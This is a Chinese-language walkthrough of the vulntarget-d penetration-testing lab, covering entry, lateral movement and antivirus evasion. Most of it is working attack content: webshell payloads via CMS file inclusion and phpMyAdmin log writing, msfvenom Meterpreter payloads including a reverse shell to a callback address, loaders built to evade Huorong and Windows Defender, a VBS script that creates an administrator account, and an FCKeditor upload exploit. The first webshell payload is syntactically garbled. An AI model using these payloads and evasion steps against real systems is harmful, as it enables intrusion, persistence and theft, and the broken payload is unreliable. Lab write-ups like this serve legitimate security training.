Vulntarget免杀专题实战教学文档

一、靶机环境概述

本靶机(vulntarget-d)是一个相对简单的渗透测试环境，主要考察外网打点、内网横向移动和免杀技术。靶机包含以下关键组件：

• 骑士CMS系统（存在文件包含漏洞）
• PHPMyAdmin（存在弱口令和日志写入漏洞）
• 内网Windows主机（存在CVE-2021-4034提权漏洞）
• 火绒杀毒软件和Windows Defender防护

二、外网打点阶段

1. 骑士CMS文件包含漏洞利用

漏洞位置：骑士CMS的模板包含功能存在文件包含漏洞

利用步骤：

1. 首先通过文件包含写入webshell：

POST /path/to/vulnerable/script HTTP/1.1
variable=1&tpl=<?php fputs(fopen("110.php","w"),"<?php eval(\$_POST[110]ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>)

2. 包含日志文件获取webshell（注意日期匹配）：

POST /path/to/vulnerable/script HTTP/1.1
variable=1&tpl=data/Runtime/Logs/Home/24_07_09.log

2. 反弹Shell与提权

1. 通过webshell上传反弹shell脚本
2. 使用CVE-2021-4034（Polkit提权漏洞）进行权限提升

三、内网横向移动

1. 内网探测

发现内网主机：

10.0.20.131:445 open (Windows 7 Ultimate 7601 Service Pack 1)
10.0.20.132:80 open
10.0.20.132:8888 open (宝塔面板)

2. PHPMyAdmin利用

利用步骤：

1. 通过弱口令root/root登录
2. 开启全局日志并写入webshell：

show global variables like "%genera%";
set global general_log='on';
SET global general_log_file='C:/phpstudy/PHPTutorial/WWW/cmd.php';
SELECT '<?php @eval($_POST["cmd"])?>';
set global general_log='off';

3. 免杀技术应用

场景：内网主机存在火绒杀毒软件

免杀方法1：使用crowsec_shelllcodeBypass项目

1. 生成原始shellcode：

msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 7 -b '\x00' lport=4444 -f raw -o crowsec.jpg

2. 使用crowsec_shelllcodeBypass.exe加载shellcode

免杀方法2：进程迁移技巧
当无法直接获取hashdump时，进行进程迁移：

run post/windows/manage/migrate

四、域控攻击

1. 信息收集

发现域控主机：

10.0.20.134:80 (IIS Windows Server)
10.0.20.134:18000 (FCKeditor编辑器)

2. FCKeditor漏洞利用

利用步骤：

1. 发现编辑器路径：

/editor/filemanager/browser/default/browser.html

2. 构造上传请求：

POST /editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F

3. 上传免杀ASPX木马（需修改文件名绕过限制）

3. Windows Defender绕过

方法1：使用VBS脚本添加用户

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","admin")
od.SetPassword "pass!@#!23"
od.SetInfo
Set of=GetObject(os&"/admin",user)
oe.add os&"/admin"

方法2：使用FourEye框架生成免杀木马

1. 生成原始shellcode：

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=8092 -f raw -o x64.raw

2. 使用FourEye进行免杀处理：

./setup.sh
# 选择xor加密方式
# 输入shellcode路径
# 生成免杀exe

五、后渗透技巧

1. RDP开启：

run post/windows/manage/enable_rdp

2. 内网扫描工具：

• 使用kscan进行内网扫描：

kscan_windows_amd64.exe -t 10.0.20.0/24 -o res.txt

3. 免杀fscan：上传定制版内网扫描工具绕过杀软检测

六、关键知识点总结

1. 文件包含漏洞利用：注意日志文件路径和日期匹配
2. PHPMyAdmin日志写入：需要全局日志权限
3. 免杀技术要点：
   • Shellcode加密（XOR等）
   • 进程注入
   • 合法程序伪装
4. 内网横向移动：
   • 多协议探测（SMB、RDP等）
   • 权限维持技术
5. 域控攻击：
   • 编辑器漏洞利用
   • 防御绕过技术

七、防御建议

1. 及时更新CMS系统和中间件
2. 禁用不必要的日志功能
3. 使用强密码策略
4. 部署多层防御机制
5. 限制网络共享和远程访问权限

八、参考资源

1. crowsec_shelllcodeBypass项目
2. FourEye免杀框架：https://github.com/zhzyker/FourEye
3. kscan内网扫描工具：https://github.com/lcvvvv/kscan/
4. 免杀技术研究：https://mp.weixin.qq.com/s/6_j38gpvTfCVDTcCYizCYA

本教学文档涵盖了从外网打点到内网横向移动的全过程，重点突出了免杀技术的应用场景和实现方法，可作为红队演练和渗透测试的参考指南。